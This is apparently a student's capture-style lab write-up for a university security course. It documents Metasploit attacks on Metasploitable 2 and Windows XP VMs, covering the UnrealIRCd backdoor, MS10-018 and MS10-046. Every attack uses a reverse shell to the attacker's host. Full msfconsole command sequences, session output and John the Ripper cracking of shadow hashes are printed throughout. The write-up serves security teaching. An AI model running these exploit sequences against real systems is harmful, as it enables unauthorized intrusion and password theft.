## https://sploitus.com/exploit?id=DB840F39-36DA-5995-B990-00BE364FFF5D
# ๐ System Exploitation & Compromising
### CAP 6135 โ Cyber Lab | Mara Burnside | UCF | April 2026
---
## ๐ Overview
Four penetration testing exercises using Metasploit on Kali Linux against two target machines: a Metasploitable 2 Linux VM and a Windows XP SP2 VM. Techniques covered include reverse shell exploitation, browser-based drive-by downloads, VNC remote desktop injection, and offline password cracking.
**All 4 questions completed โ 100 points total.**
---
## ๐ฏ Targets & Tools
| Component | Details |
|---|---|
| Attacker Machine | Kali Linux VM |
| Target 1 | Metasploitable 2 Linux VM |
| Target 2 | Windows XP SP2 VM |
| Primary Tool | Metasploit Framework (`msfconsole`) |
| Password Tool | John the Ripper |
| Shell Types Used | `cmd/unix/reverse`, `meterpreter/reverse_tcp`, `vncinject/reverse_tcp` |
---
## Question 1 โ Metasploit Attack on Metasploitable Linux (25 pts)
### Vulnerability: UnrealIRCd 3.2.8.1 Backdoor
UnrealIRCd 3.2.8.1 contained a hardcoded backdoor (CVE-2010-2075) that allowed unauthenticated remote code execution through a crafted IRC connection on port 6667.
### Configuration
| Parameter | Value |
|---|---|
| Exploit | `exploit/unix/irc/unreal_ircd_3281_backdoor` |
| Payload | `cmd/unix/reverse` |
| RHOST (target) | `192.168.56.2` |
| LHOST (Kali) | `192.168.56.3` |
| LPORT | `8888` |
### Commands
```bash
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(...) > set payload cmd/unix/reverse
msf exploit(...) > set RHOSTS 192.168.56.2
msf exploit(...) > set LHOST 192.168.56.3
msf exploit(...) > set LPORT 8888
msf exploit(...) > exploit
```
### Result
```
[*] Started reverse TCP double handler on 192.168.56.3:8888
[*] 192.168.56.2:6667 - Connected to 192.168.56.2:6667
[*] 192.168.56.2:6667 - Sending IRC backdoor command
[*] Accepted the first client connection ...
[*] Accepted the second client connection ...
[*] Command shell session 1 opened (192.168.56.3:8888 -> 192.168.56.2:42378)
at 2026-04-16 03:49:41 -0400
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP ...
```
**โ Reverse shell obtained. `uname -a` confirmed remote execution on the Metasploitable Linux VM.**
---
## Question 2 โ Metasploit Attack on Windows XP โ MS10-018 (25 pts)
### Vulnerability: MS10-018 Drive-By Download (IE6 DHTML Behaviors)
MS10-018 is a use-after-free vulnerability in Internet Explorer 6 that executes arbitrary code when a victim visits a malicious web page.
### Configuration
| Parameter | Value |
|---|---|
| Exploit | `exploit/windows/browser/ms10_018_ie_behaviors` |
| Payload | `windows/meterpreter/reverse_tcp` |
| LHOST (Kali) | `10.0.2.15` |
| LPORT | `8888` |
| SRVHOST | `0.0.0.0` |
| SRVPORT (malicious web server) | `8088` |
### Commands
```bash
msf > use exploit/windows/browser/ms10_018_ie_behaviors
msf exploit(...) > set payload windows/meterpreter/reverse_tcp
msf exploit(...) > set LHOST 10.0.2.15
msf exploit(...) > set LPORT 8888
msf exploit(...) > set SRVHOST 0.0.0.0
msf exploit(...) > set SRVPORT 8088
msf exploit(...) > exploit
# Victim visits: http://10.0.2.15:8088/
```
### Post-Exploitation โ sysinfo & ipconfig
```
meterpreter > sysinfo
Computer : VX2POEM
OS : Windows XP (5.1 Build 2600, Service Pack 2).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > ipconfig
Interface 2 โ AMD PCNET Family PCI Ethernet Adapter
Hardware MAC : 08:00:27:26:8e:19
IPv4 Address : 10.0.2.3
IPv4 Netmask : 255.255.255.0
```
> **Privilege escalation:** Meterpreter automatically migrated to `services.exe (PID 696)` and escalated to `NT AUTHORITY\SYSTEM`.
**โ Full Meterpreter session obtained with SYSTEM-level privileges. `sysinfo` and `ipconfig` confirmed remote enumeration of the target.**
---
## Question 3 โ Metasploit Attack on Windows XP โ MS10-046 VNC (25 pts)
### Vulnerability: MS10-046 Shortcut Icon DLL Loader
MS10-046 exploits how Windows Shell processes `.lnk` shortcut icon files โ loading an attacker-supplied DLL automatically when a network share folder is browsed via WebDAV.
### Configuration
| Parameter | Value |
|---|---|
| Exploit | `exploit/windows/browser/ms10_046_shortcut_icon_dllloader` |
| Payload | `windows/vncinject/reverse_tcp` |
| LHOST (Kali) | `10.0.2.15` |
| LPORT | `8888` |
| SRVHOST | `0.0.0.0` |
| SRVPORT (malicious web server) | `80` |
| URIPATH | `/` |
### Commands
```bash
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(...) > set payload windows/vncinject/reverse_tcp
msf exploit(...) > set LHOST 10.0.2.15
msf exploit(...) > set LPORT 8888
msf exploit(...) > set SRVHOST 0.0.0.0
msf exploit(...) > set SRVPORT 80
msf exploit(...) > set URIPATH /
msf exploit(...) > exploit
# Victim visits: http://10.0.2.15/
```
### Result
```
[*] Using URL: http://10.0.2.15/
[*] Server started.
[*] Sending stage (401920 bytes) to 10.0.2.3
[*] Starting local TCP relay on 127.0.0.1:5900
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] VNC Server session 1 opened (10.0.2.15:8888 -> 10.0.2.3:1118)
at 2026-04-16 22:10:55 -0400
```
> The `vncinject/reverse_tcp` payload injects a VNC server directly into a running process on the target, providing **full interactive remote desktop control** โ not read-only viewing.
**โ Full interactive VNC remote desktop session established on the Windows XP machine from Kali Linux.**
---
## Question 4 โ Offline Password Cracking with John the Ripper (25 pts)
### Objective
Crack password hashes from a copy of `/etc/shadow` for two user accounts (`newbie1` and `newbie2`) using John the Ripper's dictionary attack mode.
### Setup
| Parameter | Value |
|---|---|
| Target File | `shadow.txt` (copy of `/etc/shadow`) |
| Accounts | `newbie1`, `newbie2` |
| Hash Format | `crypt` (generic crypt3) |
| Wordlist | `/usr/share/john/password.lst` |
| Crack Time | ~57 seconds |
### Commands
```bash
# Navigate to directory containing shadow.txt
cd /media/sf_sharelab
ls
# shadow.txt Sharelab.textClipping
# Run John the Ripper with crypt format and dictionary wordlist
john --format=crypt --wordlist=/usr/share/john/password.lst shadow.txt
# Verify cracked passwords
john --show shadow.txt
# Filter results from pot file
awk '/ship|unix/' ~/.john/john.pot
grep 'ship\|unix' ~/.john/john.pot
```
### Output
```
Loaded 2 password hashes with 2 different salts (crypt, generic crypt(3) [?/64])
Will run 2 OpenMP threads
ship (newbie1)
unix (newbie2)
2g 0:00:00:57 DONE 0.03478g/s 61.66p/s 123.3c/s
Session completed.
```
### Cracked Passwords
| Account | Password |
|---|---|
| `newbie1` | `ship` |
| `newbie2` | `unix` |
**โ Both passwords cracked via dictionary attack in under 60 seconds.**
---
## ๐ Key Takeaways
**Backdoor vulnerabilities are permanent until patched** โ The UnrealIRCd backdoor required zero authentication. Any machine running the affected version was fully exploitable from anywhere on the network.
**Drive-by downloads require only a browser visit** โ MS10-018 and MS10-046 both needed no user interaction beyond visiting a URL. Unpatched IE6 on Windows XP was trivially compromised.
**Privilege escalation can be automatic** โ Meterpreter's post-exploitation modules automatically migrated to a SYSTEM-level process, going from user-level access to full OS control in seconds.
**VNC injection enables full interactive control** โ Unlike a command shell, `vncinject` gives the attacker a live graphical desktop โ enabling interaction with GUI applications, observation of user activity, and more.
**Weak passwords crack in under a minute** โ Dictionary words like `ship` and `unix` found at the bottom of the standard John wordlist were recovered from shadow hashes in 57 seconds on standard hardware.
**All vulnerabilities were 2010-era CVEs** โ Every attack in this lab exploited unpatched software from over a decade ago. The lesson: patch management and disabling legacy services (IRC, IE6) are the most effective mitigations.
---
## ๐๏ธ Repository Structure
```
lab5/
โโโ screenshots/
โ โโโ q1_unrealircd_exploit.png
โ โโโ q1_uname_result.png
โ โโโ q2_ms10018_config.png
โ โโโ q2_meterpreter_sysinfo.png
โ โโโ q2_meterpreter_ipconfig.png
โ โโโ q3_ms10046_vnc_session.png
โ โโโ q3_remote_desktop.png
โ โโโ q4_john_cracking.png
โ โโโ q4_passwords_found.png
โโโ Lab_Assignment_5_Compromising.pdf
โโโ README.md
```
---
## ๐ฅ๏ธ Environment
- **Attacker:** Kali Linux VM
- **Target 1:** Metasploitable 2 Linux VM
- **Target 2:** Windows XP SP2 VM
- **Network:** Host-only adapter (VirtualBox)
- **Course:** CAP 6135 โ Malware and Software Vulnerability Analysis
> โ ๏ธ *All attacks were performed in an isolated lab environment on intentionally vulnerable VMs provided for educational purposes.*
---
*CAP 6135 ยท Lab Assignment #5 ยท University of Central Florida ยท April 2026*